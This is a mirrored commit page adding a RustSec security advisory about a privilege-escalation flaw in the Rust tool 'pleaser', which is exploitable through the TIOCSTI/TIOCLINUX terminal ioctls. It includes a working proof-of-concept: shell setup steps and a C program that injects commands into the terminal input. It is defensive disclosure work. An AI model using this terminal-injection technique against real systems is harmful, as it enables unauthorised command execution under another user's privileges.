OMGeeky/advisory-db
1
0
Fork 0
mirror of https://github.com/OMGeeky/advisory-db.git synced 2026-01-03 01:56:41 +01:00
Code Issues Packages Projects Releases Wiki Activity

Document the privilege-escalation vulnerability in pleaser. (#1798)

Browse Source 
* Document the privilege-escalation vulnerability in pleaser. Note that the reproducer doesn't work out of the box on a modern kernel, as the ioctl TIOCSTI is disabled by default nowadays

* reviewer feedback: Include a description on how to check if you are vulnerable, fix a typo

* Revert "reviewer feedback: Include a description on how to check if you are vulnerable, fix a typo"

This reverts commit 94a4a83bd3ea0518cd2bc8a670fac1b0405da7ad.

* Fix typo

---------

Co-authored-by: Sergey "Shnatsel" Davidoff <shnatsel@gmail.com>
This commit is contained in:
Alexander Kjäll
2023-10-03 13:52:15 +00:00
committed by GitHub
parent 46754ce937
commit 59c41cbaa6
1 changed files with 49 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

49
crates/pleaser/RUSTSEC-0000-0000.md Normal file
View File

@@ -0,0 +1,49 @@
```toml
[advisory]
id = "RUSTSEC-0000-0000"
package = "pleaser"
date = "2023-04-29"
url = "https://gitlab.com/edneville/please/-/issues/13"
categories = ["privilege-escalation"]
keywords = []
cvss = "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
[versions]
patched = []
[affected]
```
# Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
please is vulnerable to privilege escalation using ioctls TIOCSTI
and TIOCLINUX on systems where they are not disabled.
Here is how to see it in action:
```
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
const char *text = "id\n";
while (*text)
ioctl(0, TIOCSTI, text++);
return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
```
Please note that:
This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.